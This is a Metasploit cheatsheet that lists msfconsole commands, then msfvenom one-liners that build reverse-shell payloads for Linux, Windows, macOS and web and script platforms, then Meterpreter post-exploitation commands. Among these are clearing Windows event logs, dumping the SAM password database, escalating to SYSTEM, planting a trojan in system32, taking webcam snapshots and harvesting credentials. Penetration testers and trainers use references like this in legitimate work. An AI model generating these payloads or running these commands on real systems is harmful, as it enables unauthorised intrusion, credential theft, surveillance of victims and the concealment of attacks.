Metasploit Cheatsheet
searchsploit <search>
searchsploit -x <file.txt>
msfconsole -h #usage options
msf > help
msf > <command> -h
msf > help search
connect <ip> <port> #netcat like
edit #edit the current module
grep <http> search <oracle> #match output containing the string 'http' from a search for modules containing the string 'oracle'
info
load <plugin> #load plugin
unload <plugin> #unload plugin
route <add/remove> <subnet> <netmask> <session_id> #allows you to route sockets through a session or 'comm', providing basic pivoting capabilities
route flush #remove all routes
route print #show all active routes
search name:mysql
search type:post
search cve:2011 author:jduck platform:linux
background
sessions -l #list sessions
sessions -i 1 #interact with session 1
set <rhost> <ip> #configure options for the current module
unset <rhost> #remove a parameter
unset all # remove all parameters
setg <rhost> <ip> #set global variables
unsetg #unset global variables
save #after setting your different variables, you can run the save command to save your current environment and settings
show <auxiliary/exploits/...>
show options
show advanced #more options
show payloads
show targets
show encoders #useful in exploit development when you aren't quite certain which payload encoding methods will work with a given exploit
show nops #display nop generators
show evasion
use <module/module_id>
back
banner
check #see if the target is vulnerable without exploiting it; not often supported by modules
color
exit
irb #drop into a live Ruby interpreter shell
jobs #Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.
kill <0> #kill job 0
loadpath #load a third-party module tree from the given path so you can point Metasploit at your own 0-day exploits, encoders, payloads, etc.
resource <karma.rc> #runs resource (batch) files that can be loaded through msfconsole.
exploit -j # run in the background
### List payloads ###
msfvenom -l
### Binaries ###
## Linux ##
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
## Windows ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
## Mac ##
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
### Web Payloads ###
## PHP ##
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
## ASP ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
## ASPX ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
## JSP ##
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
## WAR ##
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
### Scripting Payloads ###
## Python ##
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
## Bash ##
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
## Perl ##
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
### Shellcode ###
#For all shellcode see 'msfvenom --help-formats' for information on valid output formats. Msfvenom will output code that can be cut and pasted into your exploit in that language.
## Linux Based Shellcode ##
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
## Windows Based Shellcode ##
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
## Mac Based Shellcode ##
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
use exploit/multi/handler
post/multi/manage/shell_to_meterpreter
help
background
clearev #clear the application, system and security event logs on a Windows system
download <c:\\boot.ini> #use double-slashes
edit <file.txt> #use vim
execute -f <cmd.exe> -i -H #runs a command on the target
getuid #display the user running on the host
hashdump #dump SAM database
idletime #display time that the user at the remote machine has been idle
ipconfig
lpwd & lcd #local working directory commands: these apply on your local machine, not on the remote host
sysinfo
getsystem #attempt privilege escalation to SYSTEM
ps
migrate <1832> #migrate the current Meterpreter process into PID 1832 (alternatively run post/windows/manage/migrate)
resource <resource.txt> #call a file with meterpreter instructions
search -f <autoexec.bat> #locate specific file
search -f <sea*.bat> <c:\\xamp\\>
shell #standard shell on the target system
upload <trojan.exe> <c:\\windows\\system32> #use double-slashes
webcam_list
webcam_snap
load <python/kiwi/...>
creds_all